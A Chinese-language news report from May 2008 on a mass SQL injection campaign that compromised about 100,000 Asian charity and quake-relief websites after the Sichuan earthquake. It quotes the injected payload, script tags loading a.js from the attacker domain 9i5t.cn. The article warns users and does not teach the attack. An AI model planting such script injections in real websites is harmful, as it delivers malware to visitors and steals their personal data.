资讯安全再陷危机 慈善团体网站受害最甚 隐码攻击为主因
【2008年5月21日讯】
四川大地震衍伸出的问题,在各领域上屡见不鲜,不只观光业,就连救灾、慈善相关的网站,近期也被骇客锁定为主要的攻击目标,当中,“SQL隐码攻击”是主要关键。
趋势科技指出,因为四川大地震的关系,使得众多慈善团体的网站,点阅率大幅提升,也大幅增加犯罪者植入木马的机会,骇客更利用微软在两年前发布的MS06-14漏洞,进行入侵攻击,一旦使用者连上被入侵的网站,点选外部链接后,其他相关网站也会遭到攻击,目前所知,亚洲地区有近十万以上的网站遭波及。
另外,阿玛科技根据近期受害的亚洲网站进行分析,当中,更指出,只要在大型搜寻引擎,输入骇客指令的关键字,就可以看到众多网站会被植入包含“<script>”的程式语法,范例如下:
“
<script src=http:/<script src=http://9i5t.cn/a.js></script>
<script src=http://9i5t.cn/a.js></script>
”
此类攻击手段,是骇客先入侵伺服器端,找到注入点,之后让受害的网站,在无意间与骇客端连结,而当使用者连上线后,个人资料随即遭到骇客的窃取,造成个资外泄的严重问题。
虽然受害的网站已有部分修复完毕,但台湾资安产业已发出警示,提醒使用者搜寻网站时,除了注意安全警示标与外,并尽量不要连入库存网站页面,以免遭受攻击。
消息来源
- 趋势:10万中文网页遭入侵 锁定公益网站,ZDNet,2008年5月19日。
- 何宏儒,强震消息成攻击工具 10万中文网页昨遭骇,中央通讯社,2008年5月19日。
- 新闻稿:台湾网站遭受有史以来最大量 SQL Injection 攻击,阿玛科技,2008年5月20日。
- 十万中文网页遭恶意程式攻击 上网捐款要小心,Global Sources,2008年5月21日。[已失效,有存档]
外部链接
- 微软的MS06-14资讯安全特报(英文)
